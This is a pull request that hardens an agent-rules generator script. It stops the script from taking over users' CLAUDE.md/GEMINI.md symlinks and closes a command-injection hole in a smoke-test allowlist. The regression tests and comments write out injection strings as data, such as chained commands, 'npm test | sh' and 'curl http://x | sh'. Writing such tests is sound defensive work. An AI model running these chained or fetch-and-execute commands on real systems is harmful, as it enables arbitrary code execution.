### PR TITLE
fix(agent-rules): repair the CLAUDE.md write boundary and the smoke-test allowlist

### DIFF
--- a/skills/agent-rules/references/ai-tool-compatibility.md
+++ b/skills/agent-rules/references/ai-tool-compatibility.md
@@ -75,15 +75,16 @@ Claude Code only reads `CLAUDE.md` files natively. AGENTS.md is not recognized.
 - **Subdirectory CLAUDE.md**: Loaded on demand when agent reads/edits files in that directory
 - **AGENTS.md**: Never loaded natively — requires symlink
 
-### Auto-detection (default behavior)
+### Default behavior
 
-When `generate-agents.sh` detects a `.claude/` directory in the project, it **automatically creates
-CLAUDE.md symlinks** at every level where an AGENTS.md is generated. No flags required.
+`generate-agents.sh` creates CLAUDE.md and GEMINI.md symlinks at every level where an AGENTS.md is
+generated. No flags required, so Claude Code and Gemini CLI users get working agent instructions out
+of the box.
 
-This means Claude Code users get working agent instructions out of the box, without needing to
-remember `--symlinks` or `--claude-shim` flags.
+To opt out, pass `--no-symlinks`. It suppresses both files at every level, with no exceptions.
 
-To opt out, pass `--no-symlinks` explicitly.
+Existing files are never taken over: a regular CLAUDE.md/GEMINI.md, or a symlink pointing anywhere
+other than AGENTS.md, is kept and reported, and only `--force` replaces it.
 
 ### Manual symlinks (if not using the generator)
 
@@ -210,13 +211,12 @@ Feature requests are open for most of these tools.
 ## Generation Script Integration
 
 `generate-agents.sh` creates `CLAUDE.md` and `GEMINI.md` symlinks **by default** at every
-level where an AGENTS.md is generated. Additionally, when a `.claude/` directory is detected
-in the project (indicating a Claude Code environment), CLAUDE.md symlink creation is
-**automatically enabled** even if `--no-symlinks` was passed.
+level where an AGENTS.md is generated. `--no-symlinks` turns that off; there is no environment
+detection that overrides the flag.
 
 ```bash
 scripts/generate-agents.sh /path/to/project              # Symlinks created by default
-scripts/generate-agents.sh /path/to/project --no-symlinks # Skip symlinks (unless .claude/ detected)
+scripts/generate-agents.sh /path/to/project --no-symlinks # No CLAUDE.md/GEMINI.md at any level
 ```
 
 The `--claude-shim` flag creates a root-only CLAUDE.md with `@import` (legacy behavior).

--- a/skills/agent-rules/scripts/generate-agents.sh
+++ b/skills/agent-rules/scripts/generate-agents.sh
@@ -117,6 +117,35 @@ log() {
     fi
 }
 
+# A CLAUDE.md/GEMINI.md compatibility file we are allowed to write:
+# absent, a symlink we created (pointing at AGENTS.md), or our own generated
+# "@AGENTS.md" import file. Anything else — a regular file, or a symlink
+# pointing at rules the user maintains elsewhere — belongs to the user and is
+# kept unless --force. Without this check "is a symlink" was treated the same
+# as "does not exist" and a foreign link was silently repointed (#103).
+compat_file_is_ours() {
+    local file="$1"
+    if [ -L "$file" ]; then
+        [ "$(readlink "$file")" = "AGENTS.md" ]
+        return
+    fi
+    [ ! -e "$file" ] && return 0
+    grep -qxF '@AGENTS.md' "$file" 2>/dev/null
+}
+
+# One line saying what was left alone and how to override it. Printed
+# unconditionally: a skip that only shows under --verbose reads as "nothing
+# happened here" to everyone else.
+report_kept_file() {
+    local file="$1" label="$2" what
+    if [ -L "$file" ]; then
+        what="symlink → $(readlink "$file")"
+    else
+        what="regular file"
+    fi
+    echo "⏭️  Kept: $label ($what) — use --force to replace"
+}
+
 error() {
     echo "[ERROR] $*" >&2
     exit 1
@@ -1269,20 +1298,23 @@ fi
 if [ "$CREATE_SYMLINKS" = true ] && [ "$CLAUDE_SHIM" = false ]; then
     for symlink_name in CLAUDE.md GEMINI.md; do
         SYMLINK_FILE="$PROJECT_DIR/$symlink_name"
-        if [ -L "$SYMLINK_FILE" ] || [ ! -e "$SYMLINK_FILE" ]; then
+        if compat_file_is_ours "$SYMLINK_FILE"; then
             if [ "$DRY_RUN" = true ]; then
                 echo "[DRY-RUN] Would symlink: $SYMLINK_FILE → AGENTS.md"
             else
                 ln -sf AGENTS.md "$SYMLINK_FILE"
                 echo "✅ Symlinked: $SYMLINK_FILE → AGENTS.md"
             fi
-        else
-            log "$symlink_name already exists (not a symlink), skipping (use --force to replace)"
-            if [ "$FORCE" = true ]; then
+        elif [ "$FORCE" = true ]; then
+            if [ "$DRY_RUN" = true ]; then
+                echo "[DRY-RUN] Would replace: $SYMLINK_FILE → AGENTS.md (--force)"
+            else
                 rm -f "$SYMLINK_FILE"
                 ln -s AGENTS.md "$SYMLINK_FILE"
                 echo "✅ Replaced: $SYMLINK_FILE → AGENTS.md (--force)"
             fi
+        else
+            report_kept_file "$SYMLINK_FILE" "$symlink_name"
         fi
     done
 fi
@@ -2287,8 +2319,8 @@ else
             for symlink_name in CLAUDE.md GEMINI.md; do
                 SYMLINK_FILE="$PROJECT_DIR/$SCOPE_PATH/$symlink_name"
                 if [ "$(basename "$SCOPE_PATH")" = "Documentation" ]; then
-                    if [ -f "$SYMLINK_FILE" ] && [ ! -L "$SYMLINK_FILE" ] && [ "$FORCE" = false ]; then
-                        log "$SCOPE_PATH/$symlink_name already exists (regular file), skipping (use --force to replace)"
+                    if ! compat_file_is_ours "$SYMLINK_FILE" && [ "$FORCE" = false ]; then
+                        report_kept_file "$SYMLINK_FILE" "$SCOPE_PATH/$symlink_name"
                         continue
                     fi
                     if [ "$DRY_RUN" = true ]; then
@@ -2302,7 +2334,7 @@ else
                     fi
                     continue
                 fi
-                if [ -L "$SYMLINK_FILE" ] || [ ! -e "$SYMLINK_FILE" ]; then
+                if compat_file_is_ours "$SYMLINK_FILE"; then
                     if [ "$DRY_RUN" = true ]; then
                         echo "[DRY-RUN] Would symlink: $SYMLINK_FILE → AGENTS.md"
                     else
@@ -2310,9 +2342,15 @@ else
                         echo "   ↳ Symlinked: $SCOPE_PATH/$symlink_name → AGENTS.md"
                     fi
                 elif [ "$FORCE" = true ]; then
-                    rm -f "$SYMLINK_FILE"
-                    ln -s AGENTS.md "$SYMLINK_FILE"
-                    echo "   ↳ Replaced: $SCOPE_PATH/$symlink_name → AGENTS.md (--force)"
+                    if [ "$DRY_RUN" = true ]; then
+                        echo "[DRY-RUN] Would replace: $SYMLINK_FILE → AGENTS.md (--force)"
+                    else
+                        rm -f "$SYMLINK_FILE"
+                        ln -s AGENTS.md "$SYMLINK_FILE"
+                        echo "   ↳ Replaced: $SCOPE_PATH/$symlink_name → AGENTS.md (--force)"
+                    fi
+                else
+                    report_kept_file "$SYMLINK_FILE" "$SCOPE_PATH/$symlink_name"
                 fi
             done
         fi

--- a/skills/agent-rules/scripts/generate-agents.sh
+++ b/skills/agent-rules/scripts/generate-agents.sh
@@ -61,8 +61,8 @@ while [[ $# -gt 0 ]]; do
             CLAUDE_SHIM=true
             shift
             ;;
-        --no-symlinks) # DEPRECATED: symlinks are always created now
-            echo "Warning: --no-symlinks is deprecated. CLAUDE.md symlinks are always created."
+        --no-symlinks)
+            CREATE_SYMLINKS=false
             shift
             ;;
         --help|-h)

--- a/skills/agent-rules/scripts/tests/test-command-allowlist.sh
+++ b/skills/agent-rules/scripts/tests/test-command-allowlist.sh
@@ -1,0 +1,78 @@
+#!/usr/bin/env bash
+# Regression test for the smoke-test allowlist in verify-commands.sh (issue #104).
+#
+# is_safe_command() matched the first word of a command and the runner then
+# passed the whole string to `bash -c`, so "git status; touch PWNED" was
+# approved on its prefix and both halves ran. Commands carrying shell syntax
+# are now rejected outright.
+set -uo pipefail
+
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+SCRIPTS_DIR="$(dirname "$SCRIPT_DIR")"
+VERIFY="$SCRIPTS_DIR/verify-commands.sh"
+
+WORK="$(mktemp -d)"
+trap 'rm -rf "$WORK"' EXIT
+
+fail() { echo "❌ FAIL: $1"; exit 1; }
+pass() { echo "✅ PASS: $1"; }
+
+write_agents() {
+    local dir="$1" cmd="$2"
+    mkdir -p "$dir"
+    cat > "$dir/AGENTS.md" <<AGENTS
+# Fixture
+
+## Commands
+
+| Command | Purpose |
+|---------|---------|
+| \`$cmd\` | fixture |
+AGENTS
+}
+
+# --- Test 1: a chained command does not run, and is not reported as working
+FX="$WORK/chained"
+write_agents "$FX" "git status; touch $FX/PWNED"
+OUT="$(cd "$FX" && SMOKE_TEST=true bash "$VERIFY" . 2>&1)" || true
+[ -e "$FX/PWNED" ] && fail "the chained command executed — allowlist bypassed"
+grep -q "Not smoke-tested" <<<"$OUT" || fail "chained command was not reported as skipped (output was: $OUT)"
+pass "chained command neither runs nor counts as verified"
+
+# --- Test 2 (companion): a plain allowlisted command still runs
+# Without this the test above would also pass if everything were rejected.
+FX="$WORK/plain"
+write_agents "$FX" "git --version"
+OUT="$(cd "$FX" && SMOKE_TEST=true bash "$VERIFY" . 2>&1)" || true
+grep -q "command works" <<<"$OUT" || fail "plain allowlisted command was not executed (output was: $OUT)"
+pass "plain allowlisted command is still smoke-tested"
+
+# --- Test 3: the predicate itself, per shell construct
+eval "$(awk '/^is_safe_command\(\) \{/,/^\}/' "$VERIFY")"
+expect() {
+    local cmd="$1" want="$2" got
+    if is_safe_command "$cmd"; then got=allow; else got=reject; fi
+    [ "$got" = "$want" ] || fail "is_safe_command: want $want, got $got for <$cmd>"
+}
+expect 'git status' allow
+expect 'npm test' allow
+expect 'make -n test' allow
+expect 'vendor/bin/phpunit --filter Foo' allow
+expect './gradlew build' allow
+expect 'git status; touch /tmp/x' reject      # separator
+expect 'npm test && curl http://x' reject     # conjunction
+expect 'npm test | sh' reject                 # pipe
+# The next two are deliberately single-quoted: the point is that the predicate
+# sees the substitution syntax literally, so it must not expand here.
+# shellcheck disable=SC2016
+expect 'echo $(id)' reject                    # substitution
+# shellcheck disable=SC2016
+expect 'git log `id`' reject                  # legacy substitution
+expect 'npm test > /tmp/out' reject           # redirection
+expect 'bash -n scripts/*.sh' reject          # glob
+expect 'rm -rf /' reject                      # not on the allowlist
+expect 'curl http://example.com' reject       # network fetch, deliberately dropped
+pass "is_safe_command rejects every shell construct that can chain a command"
+
+echo ""
+echo "All command allowlist tests passed."

--- a/skills/agent-rules/scripts/tests/test-symlink-write-boundary.sh
+++ b/skills/agent-rules/scripts/tests/test-symlink-write-boundary.sh
@@ -1,0 +1,94 @@
+#!/usr/bin/env bash
+# Regression test for the CLAUDE.md/GEMINI.md write boundary (issues #102, #103).
+#
+# Two defects, both in generate-agents.sh:
+#   #102  --no-symlinks was documented in --help but dropped by the parser, so
+#         the symlinks were created regardless of the flag.
+#   #103  an existing CLAUDE.md that is itself a symlink was treated like a
+#         missing file and repointed to AGENTS.md — no --force, no message —
+#         because the guard tested "[ -L ] || [ ! -e ]".
+set -uo pipefail
+
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+SCRIPTS_DIR="$(dirname "$SCRIPT_DIR")"
+GENERATE="$SCRIPTS_DIR/generate-agents.sh"
+
+WORK="$(mktemp -d)"
+trap 'rm -rf "$WORK"' EXIT
+
+fail() { echo "❌ FAIL: $1"; exit 1; }
+pass() { echo "✅ PASS: $1"; }
+
+# Minimal JS fixture: enough for a root AGENTS.md, no scopes needed.
+make_fixture() {
+    local fx="$1"
+    mkdir -p "$fx/src"
+    cat > "$fx/package.json" <<'JSON'
+{ "name": "fixture", "version": "1.0.0", "scripts": { "test": "echo t" } }
+JSON
+    for i in 1 2 3 4 5; do printf 'export const c%s = %s\n' "$i" "$i" > "$fx/src/c$i.js"; done
+    git -C "$fx" init -q
+    git -C "$fx" -c user.email=t@t.t -c user.name=t add -A
+    git -C "$fx" -c user.email=t@t.t -c user.name=t commit -qm init
+}
+
+# --- Test 1 (#102): --no-symlinks suppresses both compatibility files
+FX="$WORK/no-symlinks"
+make_fixture "$FX"
+bash "$GENERATE" "$FX" --no-symlinks >/dev/null 2>&1 || fail "generate-agents.sh errored"
+[ -f "$FX/AGENTS.md" ] || fail "--no-symlinks suppressed AGENTS.md itself"
+[ -e "$FX/CLAUDE.md" ] && fail "--no-symlinks still created CLAUDE.md"
+[ -e "$FX/GEMINI.md" ] && fail "--no-symlinks still created GEMINI.md"
+pass "--no-symlinks creates AGENTS.md and no compatibility files"
+
+# --- Test 2: the default still creates them (companion to test 1)
+FX="$WORK/default"
+make_fixture "$FX"
+bash "$GENERATE" "$FX" >/dev/null 2>&1 || fail "generate-agents.sh errored"
+[ -L "$FX/CLAUDE.md" ] || fail "default run did not symlink CLAUDE.md"
+[ "$(readlink "$FX/CLAUDE.md")" = "AGENTS.md" ] || fail "CLAUDE.md points elsewhere"
+pass "default run symlinks CLAUDE.md → AGENTS.md"
+
+# --- Test 3 (#103): a foreign symlink is kept, and the user is told
+FX="$WORK/foreign-link"
+make_fixture "$FX"
+mkdir -p "$WORK/shared"
+printf '# curated rules\n' > "$WORK/shared/CLAUDE.md"
+ln -s ../shared/CLAUDE.md "$FX/CLAUDE.md"
+OUT="$(bash "$GENERATE" "$FX" 2>&1)" || fail "generate-agents.sh errored"
+[ "$(readlink "$FX/CLAUDE.md")" = "../shared/CLAUDE.md" ] \
+    || fail "foreign CLAUDE.md symlink was repointed without --force"
+grep -q "Kept: " <<<"$OUT" || fail "no notice printed for the kept file (output was: $OUT)"
+pass "foreign CLAUDE.md symlink kept, notice printed"
+
+# --- Test 4: a regular foreign file is kept too, and reported
+FX="$WORK/foreign-file"
+make_fixture "$FX"
+printf '# my own rules\n' > "$FX/GEMINI.md"
+OUT="$(bash "$GENERATE" "$FX" 2>&1)" || fail "generate-agents.sh errored"
+grep -qx '# my own rules' "$FX/GEMINI.md" || fail "regular GEMINI.md was overwritten"
+grep -q "Kept: GEMINI.md" <<<"$OUT" || fail "no notice printed for kept GEMINI.md (output was: $OUT)"
+pass "regular GEMINI.md kept, notice printed"
+
+# --- Test 5: --force replaces a foreign symlink, --dry-run --force does not
+FX="$WORK/force"
+make_fixture "$FX"
+ln -s ../shared/CLAUDE.md "$FX/CLAUDE.md"
+bash "$GENERATE" "$FX" --force --dry-run >/dev/null 2>&1 || fail "generate-agents.sh errored"
+[ "$(readlink "$FX/CLAUDE.md")" = "../shared/CLAUDE.md" ] \
+    || fail "--dry-run --force modified the tree"
+bash "$GENERATE" "$FX" --force >/dev/null 2>&1 || fail "generate-agents.sh errored"
+[ "$(readlink "$FX/CLAUDE.md")" = "AGENTS.md" ] || fail "--force did not replace the foreign symlink"
+pass "--force replaces, --dry-run --force does not"
+
+# --- Test 6: a second run over our own symlink is a no-op, not a "Kept" notice
+FX="$WORK/idempotent"
+make_fixture "$FX"
+bash "$GENERATE" "$FX" >/dev/null 2>&1 || fail "generate-agents.sh errored"
+OUT="$(bash "$GENERATE" "$FX" 2>&1)" || fail "generate-agents.sh errored on second run"
+grep -q "Kept: CLAUDE.md" <<<"$OUT" && fail "our own symlink was reported as a foreign file"
+[ "$(readlink "$FX/CLAUDE.md")" = "AGENTS.md" ] || fail "second run broke CLAUDE.md"
+pass "re-running keeps our own symlink without a notice"
+
+echo ""
+echo "All symlink write-boundary tests passed."

--- a/skills/agent-rules/scripts/verify-commands.sh
+++ b/skills/agent-rules/scripts/verify-commands.sh
@@ -115,8 +115,22 @@ mkdir -p "$(dirname "$OUTPUT_JSON")"
 # Check if a command is safe to execute using a whitelist approach.
 # Only commands whose base binary is in the ALLOWED_COMMANDS list are permitted.
 # Returns 0 if safe, 1 if not whitelisted.
+#
+# The command is executed later as a whole string by `bash -c`, so checking the
+# first word alone decides nothing: "git status; curl http://x | sh" passes a
+# base-command check and then runs both halves (#104). Anything carrying shell
+# syntax that could chain, redirect or substitute a second command is therefore
+# rejected outright rather than approved on its prefix.
 is_safe_command() {
     local cmd="$1"
+
+    # Shell metacharacters: command separators (; & |), substitution ($ `),
+    # redirection (< >), grouping ({ } ( )), globs that could expand into
+    # further arguments, and newlines. A documented build command needs none
+    # of them; anything that does is not verifiable by smoke-running it.
+    if [[ "$cmd" == *[\;\&\|\`\$\<\>\{\}\(\)\*\?\!$'\n']* ]]; then
+        return 1
+    fi
 
     # Whitelist of known safe base commands.
     # These are common build/dev tools that are safe to invoke for verification.
@@ -135,7 +149,11 @@ is_safe_command() {
         # Linters and formatters
         eslint prettier phpcs phpcbf phpstan psalm rector black flake8 mypy ruff shellcheck
         # Documentation / misc
-        jq yq curl wget
+        # curl/wget are deliberately absent: fetching a URL is not a way to
+        # verify that a documented build command works, and they are the two
+        # entries that turn an allowlisted base command into an outbound
+        # request (#104). Such commands are reported as not smoke-tested.
+        jq yq
         # Testing
         jest vitest mocha
     )
@@ -177,7 +195,7 @@ smoke_test_command() {
 
     # Safety check - skip dangerous commands
     if ! is_safe_command "$cmd"; then
-        warn "Skipping potentially dangerous command: $cmd"
+        warn "Not smoke-tested (not on the allowlist, or contains shell syntax): $cmd"
         COMMAND_RESULTS["$cmd"]='{"exists": true, "runs": false, "skipped": true, "reason": "safety"}'
         return 1
     fi


### PR DESCRIPTION
Fixes the three defects surfaced by #94, each with a regression test that is red on `main` and green here. Three atomic commits, one per issue.

## What changed

**#102 — `--no-symlinks` was a documented no-op.** `--help` and the examples advertised it as a working opt-out; the parser dropped it with a deprecation warning and created the symlinks anyway. It now sets `CREATE_SYMLINKS=false`, which both symlink blocks already respected. The default is unchanged. `ai-tool-compatibility.md` additionally claimed a detected `.claude/` directory re-enables symlinks "even if `--no-symlinks` was passed" — no such detection exists in the script, and it would defeat the flag if it did, so the paragraph is corrected rather than implemented.

**#103 — a foreign `CLAUDE.md` symlink was silently repointed.** The guard tested `[ -L ] || [ ! -e ]`, so "is a symlink" and "does not exist" took the same branch and `ln -sf` took over a link into a shared rules directory without `--force` and without a word. A compatibility file is now written only when it is ours: absent, a symlink already pointing at `AGENTS.md`, or the generated `@AGENTS.md` import file that symlink-hostile directories get. Two smaller defects in the same block came with it — the skip notice ran through `log()`, so without `--verbose` nothing was printed about a file deliberately left alone, and the `--force` path ran `rm -f`/`ln -s` even under `--dry-run`.

**#104 — the smoke-test allowlist checked a prefix, `bash -c` ran the whole string.** `git status; touch PWNED` was approved on its first word and both halves executed, reported as "command works". Commands carrying shell syntax that can chain, redirect or substitute are now rejected outright. `curl` and `wget` also leave the allowlist: fetching a URL does not verify that a documented build command works, and they were the two entries that turned an allowlisted base command into an outbound request. Rejected commands are reported as not smoke-tested, not as failures.

## Verification

Both new tests were run against `main` first and fail there — `--no-symlinks still created CLAUDE.md` and `the chained command executed — allowlist bypassed` respectively. On this branch:

```
7/7 script tests pass (including the pre-existing #82 Documentation import-file test)
shellcheck clean across scripts/, scripts/lib/, scripts/tests/
pre-commit run --files <changed>: all hooks pass
```

The allowlist test carries a companion green case (`git --version` is still executed), so it cannot pass by rejecting everything, and an idempotency case covers re-running over our own symlink.

## Not in this PR

The two remaining items from #94 — `--dry-run --json` as a machine-readable write manifest, and narrowing `allowed-tools` from `Bash(bash:*)` — are worth doing but are changes of shape rather than defect fixes, so they belong in their own PRs.

_Assisted by claude-code:claude-opus-5 — [Session](https://claude.ai/code/session_01JYQciiXoiApXBfcJrFMnA9)_
